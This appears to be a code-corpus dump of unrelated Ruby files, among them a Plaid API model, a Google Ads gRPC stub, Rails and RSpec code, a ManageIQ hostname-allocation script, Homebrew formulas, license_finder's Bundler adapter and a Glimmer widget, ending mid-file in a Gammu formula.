Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.1.0
=end
require 'date'
require 'time'
module Plaid
# The rationale for Plaid's decision regarding a proposed transfer. Will be null for `approved` decisions.
class TransferAuthorizationDecisionRationale
# A code representing the rationale for permitting or declining the proposed transfer. Possible values are: `NSF` – Transaction likely to result in a return due to insufficient funds. `RISK` - Transaction is high-risk. `MANUALLY_VERIFIED_ITEM` – Item created via same-day micro deposits, limited information available. Plaid can only offer `permitted` as a transaction decision. `LOGIN_REQUIRED` – Unable to collect the account information required for an authorization decision due to Item staleness. Can be rectified using Link update mode. `ERROR` – Unable to collect the account information required for an authorization decision due to an error.
attr_accessor :code
# A human-readable description of the code associated with a permitted transfer or transfer decline.
attr_accessor :description
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'code' => :'code',
:'description' => :'description'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'code' => :'String',
:'description' => :'String'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Plaid::TransferAuthorizationDecisionRationale` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Plaid::TransferAuthorizationDecisionRationale`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'code')
self.code = attributes[:'code']
end
if attributes.key?(:'description')
self.description = attributes[:'description']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @code.nil?
invalid_properties.push('invalid value for "code", code cannot be nil.')
end
if @description.nil?
invalid_properties.push('invalid value for "description", description cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @code.nil?
code_validator = EnumAttributeValidator.new('String', ["NSF", "RISK", "MANUALLY_VERIFIED_ITEM", "LOGIN_REQUIRED", "ERROR"])
return false unless code_validator.valid?(@code)
return false if @description.nil?
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] code Object to be assigned
def code=(code)
validator = EnumAttributeValidator.new('String', ["NSF", "RISK", "MANUALLY_VERIFIED_ITEM", "LOGIN_REQUIRED", "ERROR"])
unless validator.valid?(code)
fail ArgumentError, "invalid value for \"code\", must be one of #{validator.allowable_values}."
end
@code = code
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
code == o.code &&
description == o.description
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[code, description].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = Plaid.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.876364 | 659 | 0.641301 |
1d0637fef0cbc42a0f6274d58a773657d0885d76 | 2,555 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# Source: google/ads/googleads/v9/services/feed_item_set_link_service.proto for package 'Google.Ads.GoogleAds.V9.Services'
# Original file comments:
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'grpc'
require 'google/ads/google_ads/v9/services/feed_item_set_link_service_pb'
module Google
module Ads
module GoogleAds
module V9
module Services
module FeedItemSetLinkService
# Proto file describing the FeedItemSetLink service.
#
# Service to manage feed item set links.
class Service
include ::GRPC::GenericService
self.marshal_class_method = :encode
self.unmarshal_class_method = :decode
self.service_name = 'google.ads.googleads.v9.services.FeedItemSetLinkService'
# Returns the requested feed item set link in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
rpc :GetFeedItemSetLink, ::Google::Ads::GoogleAds::V9::Services::GetFeedItemSetLinkRequest, ::Google::Ads::GoogleAds::V9::Resources::FeedItemSetLink
# Creates, updates, or removes feed item set links.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
rpc :MutateFeedItemSetLinks, ::Google::Ads::GoogleAds::V9::Services::MutateFeedItemSetLinksRequest, ::Google::Ads::GoogleAds::V9::Services::MutateFeedItemSetLinksResponse
end
Stub = Service.rpc_stub_class
end
end
end
end
end
end
| 37.573529 | 184 | 0.625832 |
d5e56c4a8bf4738e91e82e7d840b03c141532c4e | 1,947 | class PostVote < ApplicationRecord
class Error < Exception ; end
belongs_to :post
belongs_to :user
attr_accessor :vote
after_initialize :initialize_attributes, if: :new_record?
validates_presence_of :score
validates_inclusion_of :score, :in => [SuperVoter::MAGNITUDE, 1, -1, -SuperVoter::MAGNITUDE]
after_create :update_post_on_create
after_destroy :update_post_on_destroy
def self.positive_user_ids
select_values_sql("select user_id from post_votes where score > 0 group by user_id having count(*) > 100")
end
def self.negative_post_ids(user_id)
select_values_sql("select post_id from post_votes where score < 0 and user_id = ?", user_id)
end
def self.positive_post_ids(user_id)
select_values_sql("select post_id from post_votes where score > 0 and user_id = ?", user_id)
end
def self.visible(user = CurrentUser.user)
return all if user.is_admin?
where(user: user)
end
def self.search(params)
q = super
q = q.visible
q = q.search_attributes(params, :post, :user, :score)
q.apply_default_order(params)
end
def initialize_attributes
self.user_id ||= CurrentUser.user.id
if vote == "up"
self.score = magnitude
elsif vote == "down"
self.score = -magnitude
end
end
def update_post_on_create
if score > 0
Post.where(:id => post_id).update_all("score = score + #{score}, up_score = up_score + #{score}")
else
Post.where(:id => post_id).update_all("score = score + #{score}, down_score = down_score + #{score}")
end
end
def update_post_on_destroy
if score > 0
Post.where(:id => post_id).update_all("score = score - #{score}, up_score = up_score - #{score}")
else
Post.where(:id => post_id).update_all("score = score - #{score}, down_score = down_score - #{score}")
end
end
def magnitude
if user.is_super_voter?
SuperVoter::MAGNITUDE
else
1
end
end
end
| 27.041667 | 110 | 0.684643 |
116899b0adb956cdaa7b80db381ef85efa5776d6 | 286 | require_relative '../../spec_helper'
describe "Complex#marshal_dump" do
it "is a private method" do
Complex.should have_private_instance_method(:marshal_dump, false)
end
it "dumps real and imaginary parts" do
Complex(1, 2).send(:marshal_dump).should == [1, 2]
end
end
| 23.833333 | 69 | 0.72028 |
1d2a5e9c746b9f5c977dadaeef5f1e7ba1746d7b | 966 | require 'pg'
require 'date'
now = DateTime.now
con = PG.connect(:dbname => "#{$evm.object['db_database']}",
:user => "#{$evm.object['db_user']}",
:password => "#{$evm.object.decrypt('db_password')}",
:host => "#{$evm.object['db_hostname']}" )
res = con.exec "select hostname,ipaddr from hosts where allocated = FALSE and provisioning = FALSE limit 1;"
if res then
$evm.log(:info, "Found an available hostname and ip address: #{res.first['hostname']} :: #{res.first['ipaddr']}")
update = con.exec "update hosts set provisioning = TRUE , mod_date = \'#{now.year()}-#{now.mon()}-#{now.mday()} #{now.hour()}:#{now.min()}:#{now.sec()}\' where hostname = \'#{res.first['hostname']}\';"
else
$evm.log(:info, "Couldn't get a hostname from the database")
exit MIQ_ERROR
end
$evm.object.options[:vm_target_name] = "#{res.first['hostname']}"
$evm.object.options[:vm_target_hostname] = "#{res.first['hostname']}"
| 43.909091 | 203 | 0.620083 |
873668165940b6ca1316c3d83292d4f598862110 | 144 | # Be sure to restart your server when you modify this file.
DummyApp::Application.config.session_store :cookie_store, key: '_finishes_session'
| 36 | 82 | 0.805556 |
62ccd2b9ec5de36d63c60255897da1e78903d6d8 | 589 | name 'graphite'
maintainer 'Sous Chefs'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs/Configures graphite'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '1.0.7'
supports 'ubuntu'
supports 'debian'
supports 'redhat'
supports 'centos'
supports 'scientific'
supports 'oracle'
depends 'poise-python', '~> 1.7.0'
source_url 'https://github.com/sous-chefs/graphite'
issues_url 'https://github.com/sous-chefs/graphite/issues'
chef_version '>= 12.11' if respond_to?(:chef_version)
| 28.047619 | 72 | 0.711375 |
ed028d6282fd3a71f1e878905eab1967b361293f | 6,061 | require 'formula'
# NOTE: When updating Wine, please check Wine-Gecko and Wine-Mono for updates too:
# http://wiki.winehq.org/Gecko
# http://wiki.winehq.org/Mono
class Wine < Formula
homepage 'http://winehq.org/'
stable do
url 'http://downloads.sourceforge.net/project/wine/Source/wine-1.6.tar.bz2'
sha256 'e1f130efbdcbfa211ca56ee03357ccd17a31443889b4feebdcb88248520b42ae'
depends_on 'little-cms'
end
devel do
url 'http://downloads.sourceforge.net/project/wine/Source/wine-1.7.5.tar.bz2'
sha256 '355c2980c457f7d714132fcf7008fcb9ad185295bdd9f0681e9123d839952823'
depends_on 'little-cms2'
end
head do
url 'git://source.winehq.org/git/wine.git'
depends_on 'little-cms2'
end
env :std
# note that all wine dependencies should declare a --universal option in their formula,
# otherwise homebrew will not notice that they are not built universal
require_universal_deps
# Wine will build both the Mac and the X11 driver by default, and you can switch
# between them. But if you really want to build without X11, you can.
depends_on :x11 => :recommended
depends_on 'freetype' if build.without? 'x11'
depends_on 'jpeg'
depends_on 'libgphoto2'
depends_on 'libicns'
depends_on 'libtiff'
depends_on 'sane-backends'
depends_on 'libgsm' => :optional
resource 'gecko' do
url 'http://downloads.sourceforge.net/wine/wine_gecko-2.24-x86.msi', :using => :nounzip
version '2.24'
sha1 'b4923c0565e6cbd20075a0d4119ce3b48424f962'
end
resource 'mono' do
url 'http://downloads.sourceforge.net/wine/wine-mono-0.0.8.msi', :using => :nounzip
sha1 'dd349e72249ce5ff981be0e9dae33ac4a46a9f60'
end
fails_with :llvm do
build 2336
cause 'llvm-gcc does not respect force_align_arg_pointer'
end
fails_with :clang do
build 421
cause 'error: invalid operand for instruction lretw'
end
def patches
p = []
if build.stable?
# http://bugs.winehq.org/show_bug.cgi?id=34188
p << 'http://bugs.winehq.org/attachment.cgi?id=45507'
# http://bugs.winehq.org/show_bug.cgi?id=34162
p << 'http://bugs.winehq.org/attachment.cgi?id=45562' if MacOS.version >= :mavericks
end
if build.devel?
# http://bugs.winehq.org/show_bug.cgi?id=34166
p << 'http://bugs.winehq.org/attachment.cgi?id=46394'
end
p
end
# the following libraries are currently not specified as dependencies, or not built as 32-bit:
# configure: libv4l, gstreamer-0.10, libcapi20, libgsm
# Wine loads many libraries lazily using dlopen calls, so it needs these paths
# to be searched by dyld.
# Including /usr/lib because wine, as of 1.3.15, tries to dlopen
# libncurses.5.4.dylib, and fails to find it without the fallback path.
def wine_wrapper; <<-EOS.undent
#!/bin/sh
DYLD_FALLBACK_LIBRARY_PATH="#{library_path}" "#{bin}/wine.bin" "$@"
EOS
end
def install
# Build 32-bit; Wine doesn't support 64-bit host builds on OS X.
build32 = "-arch i386 -m32"
ENV.append "CFLAGS", build32
ENV.append "LDFLAGS", build32
# The clang that comes with Xcode 5 no longer miscompiles wine. Tested with 1.7.3.
if ENV.compiler == :clang and MacOS.clang_build_version < 500
opoo <<-EOS.undent
Clang currently miscompiles some parts of Wine.
If you have GCC, you can get a more stable build with:
brew install wine --cc=gcc-4.2 # or 4.7, 4.8, etc.
EOS
end
# Workarounds for XCode not including pkg-config files
ENV.libxml2
ENV.append "LDFLAGS", "-lxslt"
# Note: we get freetype from :x11, but if the freetype formula has been installed
# separately and not built universal, it's going to get picked up and break the build.
# We cannot use FREETYPE_LIBS because it is inserted after LDFLAGS and thus cannot
# take precedence over the homebrew freetype.
ENV.prepend "LDFLAGS", "-L#{MacOS::X11.lib}" unless build.without? 'x11'
args = ["--prefix=#{prefix}"]
args << "--disable-win16" if MacOS.version <= :leopard or ENV.compiler == :clang
# 64-bit builds of mpg123 are incompatible with 32-bit builds of Wine
args << "--without-mpg123" if Hardware.is_64_bit?
args << "--without-x" if build.without? 'x11'
system "./configure", *args
unless ENV.compiler == :clang or ENV.compiler == :llvm
# The Mac driver uses blocks and must be compiled with clang even if the rest of
# Wine is built with gcc. This must be done after configure.
system 'make', 'dlls/winemac.drv/Makefile'
inreplace 'dlls/winemac.drv/Makefile', /^CC\s*=\s*[^\s]+/, "CC = clang"
end
system "make install"
(share/'wine/gecko').install resource('gecko')
(share/'wine/mono').install resource('mono')
# Use a wrapper script, so rename wine to wine.bin
# and name our startup script wine
mv bin/'wine', bin/'wine.bin'
(bin/'wine').write(wine_wrapper)
# Don't need Gnome desktop support
(share/'applications').rmtree
end
def caveats
s = <<-EOS.undent
You may want to get winetricks:
brew install winetricks
The current version of Wine contains a partial implementation of dwrite.dll
which may cause text rendering issues in applications such as Steam.
We recommend that you run winecfg, add an override for dwrite in the
Libraries tab, and edit the override mode to "disable". See:
http://bugs.winehq.org/show_bug.cgi?id=31374
EOS
unless build.without? 'x11'
s += <<-EOS.undent
By default Wine uses a native Mac driver. To switch to the X11 driver, use
regedit to set the "graphics" key under "HKCU\Software\Wine\Drivers" to
"x11" (or use winetricks).
For best results with X11, install the latest version of XQuartz:
http://xquartz.macosforge.org/
EOS
end
return s
end
private
def library_path
paths = ["#{HOMEBREW_PREFIX}/lib", '/usr/lib']
paths.unshift(MacOS::X11.lib) unless build.without? 'x11'
paths.join(':')
end
end
| 32.940217 | 96 | 0.6852 |
33debfb8700744f8221391bbe4581a66aadc2911 | 907 | module NavigationHelpers
# Maps a name to a path. Used by the
#
# When /^I go to (.+)$/ do |page_name|
#
# step definition in web_steps.rb
#
def path_to(page_name)
case page_name
when /the home\s?page/
'/'
when /the new post page/
new_post_path
when /the sign up page/
new_user_registration_path
# Add more mappings here.
# Here is an example that pulls values out of the Regexp:
#
# when /^(.*)'s profile page$/i
# user_profile_path(User.find_by_login($1))
else
begin
page_name =~ /the (.*) page/
path_components = $1.split(/\s+/)
self.send(path_components.push('path').join('_').to_sym)
rescue Object => e
raise "Can't find mapping from \"#{page_name}\" to a path.\n" +
"Now, go and add a mapping in #{__FILE__}"
end
end
end
end
World(NavigationHelpers)
| 23.25641 | 71 | 0.593164 |
6a103c575c8914b3f59d38096f22e1e7f70a661c | 4,179 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe ChangeSetPersister::UpdateAspaceDao do
let(:shoulder) { "99999/fk4" }
let(:blade) { "123456" }
with_queue_adapter :inline
it "updates ASpace with a new DAO when an item is marked complete" do
stub_aspace_login
stub_find_archival_object(component_id: "MC001.01_c000001")
stub_aspace(pulfa_id: "MC001.01_c000001")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "260330")
change_set_persister = ChangeSetPersister.default
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC001.01_c000001")
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create).to have_been_made
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/concern/scanned_resources/#{change_set.id}/manifest") }).to have_been_made
# Ensure the archival object was linked to the digital object.
expect(mocked_archival_object_update).to have_been_made
end
it "adds a download link as the DAO if it's a zip file" do
stub_aspace_login
stub_find_archival_object(component_id: "MC001.01_c000001")
stub_aspace(pulfa_id: "MC001.01_c000001")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "260330")
# Stub preservation since we have a stubbed FileSet with no real content to
# preserve.
allow(PreserveResourceJob).to receive(:perform_later)
change_set_persister = ChangeSetPersister.default
zip_file_set = FactoryBot.create_for_repository(:zip_file_set)
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC001.01_c000001", member_ids: zip_file_set.id)
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create).to have_been_made
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/downloads/#{zip_file_set.id}/file/#{zip_file_set.original_file.id}") }).to have_been_made
# Ensure the archival object was linked to the digital object.
expect(mocked_archival_object_update).to have_been_made
end
it "overrides previous Figgy DAO" do
stub_aspace_login
stub_find_archival_object(component_id: "MC230_c117")
stub_find_digital_object(ref: "/repositories/3/digital_objects/12331")
stub_aspace(pulfa_id: "MC230_c117")
stub_ezid(shoulder: shoulder, blade: blade)
mocked_digital_object_create = stub_create_digital_object
mocked_archival_object_update = stub_archival_object_update(archival_object_id: "298998")
change_set_persister = ChangeSetPersister.default
resource = FactoryBot.create_for_repository(:scanned_resource, source_metadata_identifier: "MC230_c117")
change_set = ChangeSet.for(resource)
change_set.validate(state: "complete")
expect(change_set).to be_valid
change_set_persister.save(change_set: change_set)
# Ensure the digital object was made.
expect(mocked_digital_object_create.with { |req| req.body.include?("http://www.example.com/concern/scanned_resources/#{change_set.id}/manifest") }).to have_been_made
expect(mocked_archival_object_update).to have_been_made
# Ensure the old figgy URI isn't in there.
expect(mocked_archival_object_update.with { |req| req.body.include?("/repositories/3/digital_objects/12331") })
.not_to have_been_made
# Ensure the other instances aren't lost.
expect(mocked_archival_object_update.with { |req| req.body.include?("mixed_materials") })
.to have_been_made
end
end
| 50.963415 | 184 | 0.78057 |
26d82506ade45d6bf08506723bf130f8806e5ec4 | 1,155 | require_relative '../lib/credit_card'
require 'minitest/autorun'
describe 'Test hashing requirements' do
before do
@cc1 = CreditCard.new('4916603231464963', 'Mar-30-2020',
'Soumya Ray', 'Visa')
@cc2 = CreditCard.new('4916603231464963', 'Mar-30-2020',
'Soumya Ray', 'Visa')
@cc3 = CreditCard.new('5423661657234057', 'Feb-30-2020',
'Soumya Ray', 'Mastercard')
end
describe 'Test regular hashing' do
it 'should find the same hash for identical cards' do
@cc1.hash.must_equal @cc2.hash
end
it 'should produce different hashes for different information' do
@cc1.hash.wont_equal @cc3.hash
end
end
describe 'Test cryptographic hashing' do
it 'should find the same hash for identical cards' do
@cc1.hash_secure.must_equal @cc2.hash_secure
end
it 'should produce different hashes for different information' do
@cc1.hash_secure.wont_equal @cc3.hash_secure
end
it 'should not produce the same regular vs. cryptographic hash' do
@cc1.hash.to_s.wont_equal @cc1.hash_secure.to_s
end
end
end
| 30.394737 | 70 | 0.658009 |
1c552939db1b5d77ef69d26ee788f252c766f926 | 2,765 | # frozen_string_literal: true
require 'bundler'
module LicenseFinder
class Bundler < PackageManager
def initialize(options = {})
super
@ignored_groups = options[:ignored_groups]
@definition = options[:definition] # dependency injection for tests
end
def current_packages
logger.debug self.class, "including groups #{included_groups.inspect}"
details.map do |gem_detail, bundle_detail|
BundlerPackage.new(gem_detail, bundle_detail, logger: logger).tap do |package|
log_package_dependencies package
end
end
end
def package_management_command
'bundle'
end
def prepare_command
ignored_groups_argument = !ignored_groups.empty? ? "--without #{ignored_groups.to_a.join(' ')}" : ''
"bundle install #{ignored_groups_argument}".strip
end
def possible_package_paths
[project_path.join(gemfile)]
end
private
attr_reader :ignored_groups
def definition
# DI
ENV['BUNDLE_PATH'] = project_path.to_s
ENV['BUNDLE_GEMFILE'] = "#{project_path}/#{gemfile}"
@definition ||= ::Bundler::Definition.build(detected_package_path, lockfile_path, nil)
end
def details
gem_details.map do |gem_detail|
bundle_detail = bundler_details.detect { |bundler_detail| bundler_detail.name == gem_detail.name }
[gem_detail, bundle_detail]
end
end
def gem_details
return @gem_details if @gem_details
# clear gem paths before running specs_for
Gem.clear_paths
if bundler_config_path_found
::Bundler.reset!
::Bundler.configure
end
@gem_details = definition.specs_for(included_groups)
end
def bundler_details
@bundler_details ||= definition.dependencies
end
def included_groups
definition.groups - ignored_groups.map(&:to_sym)
end
def lockfile_path
project_path.join(lockfile)
end
def bundler_config_path_found
config_file = project_path.join('.bundle/config')
return false unless File.exist?(config_file)
content = File.readlines(config_file)
content.grep(/BUNDLE_PATH/).count.positive?
end
def log_package_dependencies(package)
dependencies = package.children
if dependencies.empty?
logger.debug self.class, format("package '%s' has no dependencies", package.name)
else
logger.debug self.class, format("package '%s' has dependencies:", package.name)
dependencies.each do |dep|
logger.debug self.class, format('- %s', dep)
end
end
end
def gemfile
File.basename(ENV['BUNDLE_GEMFILE'] || 'Gemfile')
end
def lockfile
"#{gemfile}.lock"
end
end
end
| 25.366972 | 106 | 0.667993 |
62aa3362c8342d22cda5fd5fc22918e437cd52e3 | 1,978 | # Copyright (c) 2007-2021 Andy Maleh
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'glimmer/swt/widget_proxy'
require 'glimmer/swt/swt_proxy'
module Glimmer
module SWT
class ScrolledCompositeProxy < Glimmer::SWT::WidgetProxy
def post_initialize_child(child)
auto_exec do
swt_widget.content = child.swt_widget
end
# TODO consider triggering this method in the future upon resizing of content with a listener (on_control_resized)
# child.on_control_resized do
# swt_widget.set_min_size(swt_widget.computeSize(child.bounds.width, child.bounds.height))
# end
end
def post_add_content
calculate_min_size
end
def calculate_min_size
auto_exec do
swt_widget.set_min_size(swt_widget.computeSize(SWTProxy[:default], SWTProxy[:default]))
end
end
alias recalculate_min_size calculate_min_size
end
end
end
| 38.784314 | 122 | 0.737108 |
f7295b684057034994061b5cecbef1838bfff8ce | 772 | Gem::Specification.new do |s|
s.name = 'ultrasoap'
s.version = '0.1.6'
s.summary = "Simple Ruby client library for UltraDNS SOAP API"
s.description = "Connect to Neustar's UltraDNS SOAP API. FKA ultrasoap-ruby. Any feedback or contribution is appreciated."
s.authors = ["Gabriel Sambarino"]
s.email = '[email protected]'
s.files = `git ls-files`.split("\n")
s.homepage = 'https://github.com/chrean/ultrasoap-ruby'
s.license = "MIT"
s.require_paths = ["lib"]
s.required_ruby_version = '~> 2.0'
s.rubyforge_project = s.name
s.license = 'MIT'
s.add_dependency "savon", "~> 2.0"
s.add_dependency "settingslogic", "~> 2.0"
s.add_development_dependency "rspec", "~> 2.10"
end
| 33.565217 | 126 | 0.632124 |
18112c7e2d7b2f7aed41ab480e5a0b79e11368df | 515 | cask "sabnzbd" do
version "3.2.1"
sha256 "d007fd890ddfce91e693cd7b759f48ae9fb01750574108f8354eccd15effae99"
url "https://github.com/sabnzbd/sabnzbd/releases/download/#{version}/SABnzbd-#{version}-osx.dmg",
verified: "github.com/sabnzbd/sabnzbd/"
name "SABnzbd"
desc "Binary newsreader"
homepage "https://sabnzbd.org/"
livecheck do
url :url
strategy :github_latest
end
depends_on macos: ">= :yosemite"
app "SABnzbd.app"
zap trash: "~/Library/Application Support/SABnzbd"
end
| 23.409091 | 99 | 0.72233 |
f802cf9767412041f3c5deff365a7e642259b509 | 309 | require './lib/main'
use Rack::MiniProfiler if ENV.has_key?("PROFILE")
%w{w webdav}.each do |point|
map "/#{point}/" do
run DAV4Rack::Handler.new(resource_class: WebSync::FileResource, root_uri_path: "/#{point}/", log_to: ['log/webdav.log', Logger::DEBUG])
end
end
map '/' do
run WebSync::App
end
| 23.769231 | 140 | 0.676375 |
7a1ec54bba7b6966b06b0c2a11524b6361ae01b3 | 437 | # frozen_string_literal: true
# Be sure to restart your server when you modify this file.
Dummy::Application.config.session_store :cookie_store, key: '_dummy_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# Dummy::Application.config.session_store :active_record_store
| 43.7 | 76 | 0.810069 |
e9fc5463d8de1f9df925987ac3a7bfb63e73c1a7 | 1,829 | require "google_drive"
require 'csv'
module Gdrive
class NotFound < RuntimeError; end
class Spread
attr_reader :key
def initialize(ds, key)
@ds = ds
@key = key
@raw = ds.spreadsheet_by_key(key)
end
def raw
@raw or raise NotFound.new("spreadsheet not found: '#{@key}'")
end
def sheet(name)
case name.to_s
when /\A\d+\Z/
Sheet.new(self, name.to_i, nil)
else
Sheet.new(self, nil, name.to_s)
end
end
def sheets
raw.worksheets.map.with_index{|ws, i| Sheet.new(self, i, ws.title, ws)}
end
end
class Sheet
def initialize(spread, index, title, raw = nil)
@spread = spread
@index = index
@title = title
@raw = raw
end
def sp
@spread.raw
end
def raw
@raw ||= sp.worksheet_by_title(@title) if @title
@raw ||= sp.worksheets[@index] if @index
@raw or raise NotFound.new("worksheet not found: '#{@title || @index}'")
end
def title
@title ||= raw.title
end
def attrs
{
"index" => @index,
"title" => @title,
"path" => path,
}
end
def to_s
"#{@index}: #{@title} (#{path})"
end
def path
if @title
"/sheets/%s/%s" % [@spread.key, URI.escape(@title)]
elsif @index
"/sheets/%s/%s" % [@spread.key, @index]
else
nil
end
end
def rows
raw.rows
end
end
def self.config_path!
::File.realpath(ENV['GDRIVE_CONFIG'] || "config.json")
end
def self.new_session
GoogleDrive::Session.from_config(config_path!)
end
def self.spread(key)
Spread.new(new_session, key)
end
end
if $0 == __FILE__
Gdrive.new_session.root_collection
puts "Authorized (#{Gdrive.config_path!})"
end
| 18.29 | 78 | 0.556042 |
e83104729bffca90a1a67080170676c542f33e21 | 216 | # frozen_string_literal: true
class Admin::Search::TextFieldComponent < ViewComponent::Form::TextFieldComponent
self.tag_klass = ActionView::Helpers::Tags::TextField
def html_class
'form-control'
end
end
| 21.6 | 81 | 0.773148 |
18417791d089f43e80818467caedf718b2b3cfb2 | 1,005 | class Gammu < Formula
desc "Command-line utility to control a phone"
homepage "https://wammu.eu/gammu/"
